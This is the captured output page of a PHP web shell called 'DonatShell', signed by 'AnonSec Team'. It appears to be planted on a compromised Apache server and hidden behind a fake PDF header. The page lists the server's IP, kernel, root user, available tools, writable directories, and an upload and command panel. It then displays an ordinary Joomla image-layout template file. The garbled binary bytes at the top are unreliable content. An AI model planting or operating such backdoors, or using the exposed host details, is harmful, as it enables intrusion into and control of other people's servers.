%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/11584/root/var/www/html/old/templates/sj_flatnews/html/layouts/joomla/content/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/11584/root/var/www/html/old/templates/sj_flatnews/html/layouts/joomla/content/intro_image.php
<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$params  = $displayData->params;

$templateParams = JFactory::getApplication()->getTemplate(true)->params;
?>
<?php $images = json_decode($displayData->images); ?>
<?php if (isset($images->image_intro) && !empty($images->image_intro)) : ?>
	<?php $imgfloat = (empty($images->float_intro)) ? $params->get('float_intro') : $images->float_intro; ?>
	
	<?php
	$imgattr ='';
	$imgW = (isset($leadingFlag) && $leadingFlag)?$templateParams->get('leading_width', '300'):$templateParams->get('intro_width', '200');
	$imgH = (isset($leadingFlag) && $leadingFlag)?$templateParams->get('leading_height', '300'):$templateParams->get('intro_height', '200');
	$imgsrc = YTTemplateUtils::resize($images->image_intro, $imgW, $imgH, array($templateParams->get('thumbnail_background', '#ffffff')));
	if($templateParams->get('includeLazyload')==1){
		$imgattr = ' data-original="'.$imgsrc.'"';
		$imgsrc  = JURI::base().'templates/'.JFactory::getApplication()->getTemplate().'/images/white.gif';
	}
	?>
	
	<?php //var_dump($displayData->author);?>
	<div class="pull-<?php echo htmlspecialchars($imgfloat); ?> item-image">
		<img 	<?php if ($images->image_intro_caption): echo 'class="caption"'.' title="' .htmlspecialchars($images->image_intro_caption) .'"'; endif; ?>
				src="<?php echo htmlspecialchars($imgsrc); ?>"
				<?php echo $imgattr; ?>
				alt="<?php echo htmlspecialchars($images->image_intro_alt); ?>"
		/>
		
		<div class="show-more">
			
			<?php if ($params->get('show_author') && !empty($displayData->author )) : ?>
			<div class="author">
				<span><?php echo JText::_('SJ_POST'); ?></span>
				<?php $author =  $displayData->author; ?>
				<?php $author = ($displayData->created_by_alias ? $displayData->created_by_alias : $author);?>
				
				<?php if (!empty($displayData->contactid ) &&  $params->get('link_author') == true):?>
					<?php echo JHTML::_('link',JRoute::_('index.php?option=com_contact&view=contact&id='.$displayData->contactid),$author); ?>
				<?php else :?>
					<?php echo $author; ?>
				<?php endif; ?>
			</div>
			<?php endif; ?>
			<div class="zoom">
				<a class="hover-zoom" data-rel="prettyPhoto" title="<?php echo $images->image_intro_caption;?>" href="<?php echo htmlspecialchars($images->image_intro); ?>">
					<span>Zoom</span>
					<i class="icon-picture"></i>
				</a>
			</div>
		</div>
	</div>
<?php endif; ?>

Anon7 - 2022
AnonSec Team